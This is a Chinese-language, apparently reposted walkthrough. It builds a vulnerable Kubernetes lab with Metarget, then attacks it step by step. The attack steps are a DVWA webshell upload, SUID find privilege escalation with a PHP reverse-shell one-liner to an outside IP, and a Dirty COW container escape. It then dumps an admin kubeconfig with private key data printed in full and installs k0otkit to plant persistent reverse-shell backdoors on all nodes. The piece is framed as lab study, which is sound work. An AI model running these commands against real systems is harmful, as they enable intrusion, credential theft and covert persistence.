雲原生攻防靶場-Metarget


Metarget目前僅支持在Ubuntu 16.04和18.04安裝運行,在20.04上可能會遇到依賴項問題。安裝步驟十分簡單。
這里使用Ubuntu 18.04為例進行安裝:

git clone https://github.com/brant-ruan/metarget.git
cd metarget/
pip3 install -r requirements.txt

然后執行以下命令,為系統安裝帶有CVE-2019-5736容器逃逸漏洞的Docker:

sudo ./metarget cnv install cve-2019-5736

接着執行以下命令,為系統安裝帶有CVE-2018-1002105權限提升漏洞的Kubernetes:

sudo ./metarget cnv install cve-2018-1002105 --domestic

集群部署成功后,最后執行以下命令,在當前集群上部署一個容器化DVWA:

sudo ./metarget appv install dvwa --external

整個交互過程如下:

ubuntu@VM-8-10-ubuntu:~/metarget-0.5$ sudo ./metarget cnv install cve-2019-5736
cve-2019-5736 is going to be installed
uninstalling current docker gadgets if applicable
installing prerequisites
adding apt repository deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable
adding apt repository deb http://archive.ubuntu.com/ubuntu xenial-updates universe
adding apt repository deb http://archive.ubuntu.com/ubuntu bionic-updates universe
installing docker-ce with 18.03.1~ce~3-0~ubuntu version

cve-2019-5736 successfully installed
ubuntu@VM-8-10-ubuntu:~/metarget-0.5$ sudo ./metarget cnv install cve-2018-1002105 --domestic
docker already installed
cve-2018-1002105 is going to be installed
uninstalling current kubernetes if applicable
pre-configuring
pre-installing
adding apt repository deb https://mirrors.aliyun.com/kubernetes/apt/ kubernetes-xenial main
installing kubernetes-cni with 0.7.5-00 version
installing kubectl with 1.11.10-00 version
installing kubelet with 1.11.10-00 version
installing kubeadm with 1.11.10-00 version
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-proxy-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-controller-manager-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-apiserver-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-scheduler-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/pause:3.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/etcd-amd64:3.2.18
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/coredns:1.1.3
running kubeadm
installing cni plugin
installing flannel
pulling quay.mirrors.ustc.edu.cn/coreos/flannel:v0.10.0-amd64
generating kubernetes worker script
kubernetes worker script generated at tools/install_k8s_worker.sh
cve-2018-1002105 successfully installed
ubuntu@VM-8-10-ubuntu:~/metarget-0.5$ sudo ./metarget appv install dvwa --external
docker already installed
kubernetes already installed
dvwa is going to be installed
node port 30000 is allocated for service in vulns_app/dvwa/dvwa/dvwa-service.yaml
applying yamls/k8s_metarget_namespace.yaml
applying vulns_app/dvwa/dvwa/dvwa-deployment.yaml
applying data/dvwa-service.yaml
dvwa successfully installed

根據命令行輸出的內容,我們可以直接在瀏覽器中訪問到容器內的DVWA服務:

可以看到,只需要三行命令,我們就完成了一個多層次靶機環境的構建。
環境的清理也十分簡單,只需依次執行以下命令即可:

./metarget appv remove dvwa
./metarget cnv remove cve-2018-1002105
./metarget cnv remove cve-2019-5736

參考:http://blog.nsfocus.net/metarget/
https://mp.weixin.qq.com/s/H48WNRRtlJil9uLt-O9asw

使用admin/password登陸dvwa,直接使用文件上傳來獲取webshell。

上傳冰蠍的shell連接獲得webshell,可以看到當前權限為www-data權限。

接下來進行提權操作。

臟牛提權:Linux內核> = 2.6.22(2007年發行)開始就受影響了,直到2016年10月18日才修復。
查看發行版本
cat /etc/issue
cat /etc/*-release
查看內核版本信息
uname -a
SUID配置錯誤提權:
以下命令將嘗試查找具有root權限的SUID的文件,不同系統適用於不同的命令
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;

這里我為了方便測試給環境中的find加了suid權限

通過命令查找設置了suid權限的可執行程序:

find / -perm -u=s -type f 2>/dev/null

find的-exec參數可以用來執行任意命令。因此我們可以使用添加了suid標識的find可執行程序以root身份執行命令來提權。我們嘗試使用find來執行whomai命令。

find xxx -exec whoami \;

接着我們可以使用find來執行反彈shell命令,

find shell.php -exec php -r '$sock=fsockopen("42.xxx.xxx.97",8000);exec("/bin/sh -i <&3 >&3 2>&3");' \;

這里使用冰蠍執行反彈shell命令總是顯示操作失敗。


於是上傳weevely的webshell,在weevely命令行中執行反彈shell成功了。

提權成功,獲得了root權限的shell,但是這個shell並不是一個完全的root shell,它是一個euid為root,uid依舊是www-data的shell,也就是說我們只是獲得了一個暫時的root shell。

容器探測:
測試過程中發現當前環境一些命令是沒有,猜測當前環境可能是一個容器,通過查找.dockerenv文件和查看cgroup來判斷當前我們是否在容器中。通過命令回顯(kubepods)猜測我們當前處在在一個k8s的pod中。

ls -la / | grep dockerenv
cat /proc/1/cgroup

k8s、pod、容器之間的大概關系可以簡單理解為:集群中包含多個pod,pod中包含多個容器。

容器逃逸:

CVE-2016-5195臟牛漏洞:
sudo apt install -y make gcc nasm
git clone https://github.com/scumjr/dirtycow-vdso
cd dirtycow-vdso
make

運行./0xdeadbeef attacker-ip:port
將獲得宿主機的反彈shell,這里直接省略過程了,環境太卡老奔。
使用宿主機反彈回來的shell竊取Kubernetes管理員的訪問憑據:

ls -al /root | grep kube
cat /root/.kube/config
# ls -al /root | grep kube
drwxr-xr-x  4 root   root   4096 Oct 31 20:26 .kube
# cat /root/.kube/config
apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUN5RENDQWJDZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeE1UQXpNVEV5TWpZd01Wb1hEVE14TVRBeU9URXlNall3TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTGdtCm12UlcwMWpHK2FFOEVwZU5TUTZWQmxFV3p2dmR3YllWK2MrQ0laNmJEMk9DSkY2MnFLeEdTMUMrV1lDWFdYanQKeGZwYXZ2amVmZitNb1FuU2g5R0dXZ1dTQm9pUmFTdnlJazJYTVFqcUo5YnJwTVBPRDY0MTY4cEhMTTRtWE9pagozZ0plL0pOV1VkOFVhK0dYOWhNODVWeFdPSFF1V3lQR3hlVlg0cnMrU3UyOUpKcHhGdWswNG5uTGFUMklqV05RCkl0UElLTjcxSGpEcUQ1NmMrTjdVQlU3ZExLakw3SlhlUXIwUXoxZndraWllM1BzSEdybVhsQktGQWZ4Z1RKbDMKUlEyZ3lmdXVkbE1yN2dkMVRjT3M0bHVoNXFMS2ZOa1JXenV3RkRkamRPVWFsb1MzN0V4VWZ4d0lMN013ZGt6RApaR0ZiVHo2cGhhWHhPRENtcVQ4Q0F3RUFBYU1qTUNFd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0RRWUpLb1pJaHZjTkFRRUxCUUFEZ2dFQkFGeSt6a1I5bDlWRXN4UERJMDlmMFhXOWZFMXAKVUQ1Y3NRd2FOVCthSEVkYlBVcXZ5b0l3c21YcWF6Z0Zud1ZneVNwZHpLOG1zd0NJa3JsV1hOdEtzRHFhOTA0UwpTWjVyelAwM213bysyNUxkM2dyd2Jla3FQQkIvdmFqUk5KWjUzQWZybTQ3Zm5hQ3BGcUwxc0ZpcUk1K0pVTzk1CjM4eVlnalI2Tm54UVVoMlh5UDVDWkVFNVVabFgrV3lwZVVQZkEvSzUrTGpzRWI2cy9MaGJCUFFVMmtBaGtRVjAKYnhZaTlzQk5pVDdvV3U4MzRCUVBHeTFtVnBZQTF5NHRmd1Fod1lrV0NTd0lsaDZnZ1hYVkkvRW82bkpjNTNnZwpReHpKNG15ZmhQdVRrN3RoY3J5SXFMQXVhZjdkZ1JMVUw5aHV5c1VwNmkzR2dzTUNCalJVOEovQnJLST0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo=
    server: https://10.0.8.10:6443
  name: kubernetes
contexts:
- context:
    cluster: kubernetes
    user: kubernetes-admin
  name: kubernetes-admin@kubernetes
current-context: kubernetes-admin@kubernetes
kind: Config
preferences: {}
users:
- name: kubernetes-admin
  user:
    client-certificate-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUM4akNDQWRxZ0F3SUJBZ0lJYUF4bHVNNjFpUXN3RFFZSktvWklodmNOQVFFTEJRQXdGVEVUTUJFR0ExVUUKQXhNS2EzVmlaWEp1WlhSbGN6QWVGdzB5TVRFd016RXhNakkyTURGYUZ3MHlNakV3TXpFeE1qSTJNRFZhTURReApGekFWQmdOVkJBb1REbk41YzNSbGJUcHRZWE4wWlhKek1Sa3dGd1lEVlFRREV4QnJkV0psY201bGRHVnpMV0ZrCmJXbHVNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTIwQ1ZaOHBVY1I3Y3ZTTkkKMzh6dEwrUVNYLzdQSWo5aWdWUFpLN2hKYzdxNlQ5aFBkQS9zODlZb3VUUmlnWFpUQVFSU3BTM3h5TzZNaGR0NAp5cDh4eFlzUzlIbStldnk4Szd0YW4yMUFHN1ZDQVdrMWNvdU5rZGdYUTVBRTJMWHVURUJzc2tLQWVxOVlyQ25nCm8ySVZCZ0U1RzlRNm9oUnlLaU1sOG80T1JScko4ZURISTcra05iV3FKYytSMmJrN3NOWXNsSGpZc0hKR1ZJQ2sKNmNtZElDTUt0aXBtcURZMzVhRldrRE1WdUlTVUd6NTNiVmJYc2xQMkkxcEpjQm1HWERFM28yMWlzNjNjYmJ2ZApuNW5nbE15YXVUa3EzR251ZGdUc0NnR2puTmZZMTVLNGxuZGU3WDN2Z21lYW14eGVxSWhMYkpOTXgwa2poN0JsCkNzVmJEd0lEQVFBQm95Y3dKVEFPQmdOVkhROEJBZjhFQkFNQ0JhQXdFd1lEVlIwbEJBd3dDZ1lJS3dZQkJRVUgKQXdJd0RRWUpLb1pJaHZjTkFRRUxCUUFEZ2dFQkFIYkxQQzRNTnZUWjFJRG4xbXdJTWNVV3BiSjlaU3ZRT29GSQpxYmRTMk43UDFvQnJjcEkxOUtBdVZndHpLVkJmV3JaT1BrRW4xRDdERFRkdWJTbngrdiswcXRqeStMUDdUQ094Ck5aN0J6U0RYclVqRHJUTEc5bk1yUWRUM0ZvZ1NkU09QenV3bC9vRlBvTWVyVkIyTndlR3hEUEVsclVkcXduMzgKOUdFc2p5MnZuc3RROVIrSGs0aldaQ1BZN01zaUdsQUN4TGxrZWYrV2VoQ2hNMHJrKzBoSURlTjNvOGhseU1QWApBMHh5aVJFb3drS2txMU1rUTU2SVllMnVsUElPdFg5Y1NFeUdnbDgvV0ZpdUlGMDA4Z000THMzOCs0T3FjQnNkCmx6K2VZcDl0dWlYZ1ZOSkpUb2hndWRTRUVjdW8vVFlLcU1jU1c0REFiWEp3M1VKbURERT0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo=
    client-key-data: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcFFJQkFBS0NBUUVBMjBDVlo4cFVjUjdjdlNOSTM4enRMK1FTWC83UElqOWlnVlBaSzdoSmM3cTZUOWhQCmRBL3M4OVlvdVRSaWdYWlRBUVJTcFMzeHlPNk1oZHQ0eXA4eHhZc1M5SG0rZXZ5OEs3dGFuMjFBRzdWQ0FXazEKY291TmtkZ1hRNUFFMkxYdVRFQnNza0tBZXE5WXJDbmdvMklWQmdFNUc5UTZvaFJ5S2lNbDhvNE9SUnJKOGVESApJNytrTmJXcUpjK1IyYms3c05Zc2xIallzSEpHVklDazZjbWRJQ01LdGlwbXFEWTM1YUZXa0RNVnVJU1VHejUzCmJWYlhzbFAySTFwSmNCbUdYREUzbzIxaXM2M2NiYnZkbjVuZ2xNeWF1VGtxM0dudWRnVHNDZ0dqbk5mWTE1SzQKbG5kZTdYM3ZnbWVhbXh4ZXFJaExiSk5NeDBramg3QmxDc1ZiRHdJREFRQUJBb0lCQVFDMnFOU1A5cEZvK0tRLwo4cEI0MnhwVGhyZ0VQNTNEVTNrMmMydC9ML1lKczJ3YXJ3UnFsZ1g3a3RTMGp6N3R5bTBXY01xRmtJUlp1TnRiCmZWL2h0c1RaWmFieUJDYzhBU2luYWx2eWJDczNxa2VHTTJkeXVXN0ZMWGtjTVhUSU1yR0gxemgzUGs0Wlo5SUIKQkphQXAyc0thS1J5V2RwTFE2dGxEWWxFelRKNFFIQkRxOHNhUlNKSDlEWTVYMlFybGdnTldOS3FyZU45Q2wzeQo1ZGtyY0ZBVEl0Tjg0SVdiUVpCOEMrbktzZjlxMGdtWmVSSE5TaWxRUG1KVkhxZ0NqSkQ3YUFUWlQvUFRpSURnCi9IU240UVJXU3NITWRwTHozYThLMG1KVUNoeWhuVTVsN0NSdndoeVJPdlJEeE1yV25rRWVuMjBtREFOWUJ0eTEKdWMrdjBsRGhBb0dCQU50RGFqbk5Ba3VFeTNOQ2RPY05iZGhVV3dTcmxJa3JDZElhdkR0cU1PMi9KejdPNkRRegppNGswUkNydytJaUEwaHcwUWcwRnVyRk5BRHFDdjlqWi9LQkt1d3VRdXVIK1FULzlqSng2cy9sWHRualJBTmJ4CmN0TFFLMU5YbWhTODVxQlVadUdGT0w2MjM5c3Q4OWpNcitGeHhRZzFPdXFsQ3VBeFVzOElZcnZ4QW9HQkFQLzgKc2IwdjROb0Q1ZitYVm12Y2Zqd0MrN0ZVVW5aU0daU0tCVDlmbnlobHhxTXU0UDlZVEpKSDdBSTJoQ3M2aUJ6egozT0RCaDlYb083RHJyZVc4OEFRRDZBOXJMSytOTUUva2RFUFBlY0cybUM3dm9aUVhKaHpxaDB5V1lmSitLZTBiCmJqaXlVc3BnbytDR2dRMHJ5M09DUWhScE80cUc2TWVDaWxRZXpJYi9Bb0dCQUp2eGw1UmlkWFptalJoOXRJMDgKSk5yT0xDbm5LbTVnV016QXpRMW8ya0hOU1VsSGVTamZYQ2VLTDgxbXN5ektpaVViR2JzUFR4ZVl6MGZPQkVwagp4MlB0b3BoNEtDSmhaZUR3SU5pT0FJQ2ZYSjBTOFFqdWtwN1RCVzF5Q1pra1BOYmRFSXJtNkZQajF0U1pHeXdmCmNCdmtnYUR6MHVKZDNaMVVGelErSDVMUkFvR0JBS2F3TWtEQ0U0V0RjbG9iZnIvZnBTZUl2Y0k3NlRKNHhZVnUKMW5uczF5T2tHbE9hTEJLNXVhcXJRS2cwUFo0MGovdGlaRnJLU3B4a2k3SHAxYU82Z3dQcVUwcnUrL3NZVWZSRQpDOTA0RmMycEM3SE1nb2QvQjJkZTVGbGZ0MG9ERTJQOUw2bWxuTG1CY2xTNjRQL2xtNmFNbEdEY0lWUlVBdklmCk05b1E4QmViQW9HQVA4UTNxakNUY3R6aStDRWdOWkIxUUVFblA2ZjdvVVlBYllJSzluc24vSWhJUE8wSEloUWIKTVk2K01BVGJOTWo1eU8zK3N6UUVpaklCdmFVVE9nd1luZUg0NEYxUXlaZmFWbU1DOVFLMFhoSUhUZ0pwdjJMcwo5aGM0VlVLaTN3eVhUaDhxRkkrYjFpV0trb2h1YkloWkhta3BFOURlMnVETXBxMEl4cTA5Q2hBPQotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=

將以上憑據保存在本地kubeconfig文件,然后嘗試用憑據 連接並查看Kubernetes集群:

kubectl --kubeconfig ./kubeconfig get nodes
kubectl --kubeconfig ./kubeconfig get pods

控制集群+權限維持:
k0otkit允許我們在取得集群Master節點控制權限后,快速在集群所有節點上創建隱蔽、持久的反彈shell后⻔。克隆Github倉庫到攻擊者自己的Linux服務器(k0otkit依賴於Metasploit,服務器上需要存在msfvenom和 msfconsole兩個工具),修改攻擊者IP,然后執行pre_exp.sh:

git clone https://github.com/brant-ruan/k0otkit cd k0otkit
chmod u+x ./*.sh
# 修改pre_exp.sh中的ATTACKER_IP變量為實際攻擊者IP 
./pre_exp.sh


腳本執行完成后,目錄下新產生了一個k0otkit.sh文件,后面會用到。 接下來,執行handle_multi_reverse_shell.sh腳本,該腳本將打開msfconsole並運行一個反彈shell監聽模塊:

┌──(root💀kali)-[~/k0otkit-main]
└─# ./handle_multi_reverse_shell.sh
[*] Using configured payload generic/shell_reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
LHOST => 0.0.0.0
LPORT => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 0.0.0.0:4444 
msf6 exploit(multi/handler) > 

然后復制k0otkit.sh文件內容到容器逃逸后的root shell中運行,攻擊者的機器會收到傳回來的session:

k0otkit在每個節點上創建了一個特權Pod,該Pod與節點共享Net和PID命名空間,並且在容器內的/var/kube-proxy-cache路徑掛載了宿主機的根目錄,上面msfconsole收到的正是由這些特權Pod反彈回來的shell。借助這些經過去隔離的特權Pod,我們可以很方便地控制集群。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM